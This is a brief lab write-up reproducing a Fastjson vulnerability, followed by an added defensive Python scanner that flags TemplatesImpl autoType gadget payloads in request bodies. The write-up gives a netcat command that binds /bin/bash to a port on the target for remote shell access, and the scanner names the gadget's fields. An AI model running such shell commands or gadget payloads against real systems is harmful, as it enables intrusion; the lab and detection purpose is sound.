Fastjson 1.0 vulnerability reproduction

Server: Kali Linux
Attacker machine: Windows 10
After setting up the environment, test for the vulnerability.
[Image 1]
This confirms the vulnerability exists.
Generate the payload.

[Image 2]

Then start listening on the Windows 10 machine.


A shell is successfully returned.

Because the exploit relies on an nc reverse shell, make sure the target machine can execute the nc command.
On the target: nc -l -p 6666 -e /bin/bash
On the local machine: nc 192.168.80.155 (target address) 6666
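As an added defensive example (not part of the original post), the scanner below flags request bodies that carry the Fastjson TemplatesImpl autoType gadget used by this post's payload: it looks for the @type value, the _bytecodes/_tfactory/_outputProperties fields, and the base64-encoded Java class-file magic inside _bytecodes. The sample bodies are constructed and the bytecode string is a placeholder, not the post's payload.

```python
import json
import re

# Markers of the Fastjson autoType gadget used on this page: the TemplatesImpl
# @type with a class file smuggled in _bytecodes, plus the fields it requires.
TYPE_KEY = "@type"
DANGEROUS_TYPES = {"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"}
GADGET_FIELDS = {"_bytecodes", "_tfactory", "_outputProperties"}
CLASS_MAGIC_B64 = "yv66vg"  # base64 of the 0xCAFEBABE Java class-file magic
RAW_PATTERN = re.compile(r"@type|TemplatesImpl|_bytecodes", re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively collect (json_path, reason) for suspicious objects."""
    if isinstance(node, dict):
        t = node.get(TYPE_KEY)
        if isinstance(t, str) and t in DANGEROUS_TYPES:
            findings.append((path, "dangerous @type " + t))
        elif isinstance(t, str):
            findings.append((path, "autoType request for " + t))
        present = GADGET_FIELDS & set(node)
        if present:
            findings.append((path, "gadget fields " + ",".join(sorted(present))))
        bc = node.get("_bytecodes")
        if isinstance(bc, list) and any(
                isinstance(b, str) and b.startswith(CLASS_MAGIC_B64) for b in bc):
            findings.append((path, "base64 Java class file in _bytecodes"))
        for k, v in node.items():
            _walk(v, path + "." + str(k), findings)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            _walk(v, path + "[" + str(i) + "]", findings)


def scan_body(body):
    """Return findings for one request body. Standard JSON escapes such as
    \\u0040type are decoded by json.loads, so they are still caught; bodies that
    Fastjson accepts but strict JSON rejects fall back to a raw text scan."""
    findings = []
    try:
        _walk(json.loads(body), "$", findings)
    except ValueError:
        for m in RAW_PATTERN.finditer(body):
            findings.append(("raw", "non-JSON body contains " + m.group(0)))
    return findings


def is_suspicious(body):
    return bool(scan_body(body))


# Constructed sample bodies; the bytecode below is a placeholder, not real bytecode.
GADGET_BODY = ('{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",'
               '"_bytecodes":["yv66vgAAADQAEFBMQUNFSE9MREVS"],"_name":"x",'
               '"_tfactory":{},"_outputProperties":{}}')
BENIGN_BODY = '{"name":"alice","age":30}'
```

Run scan_body over each JSON request body at the WAF or in access-log replay; any "dangerous @type" or "_bytecodes" finding should alert, and a bare "autoType request" is worth reviewing if the application never expects @type from clients.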

Reference article: https://www.secfree.com/article/591.html
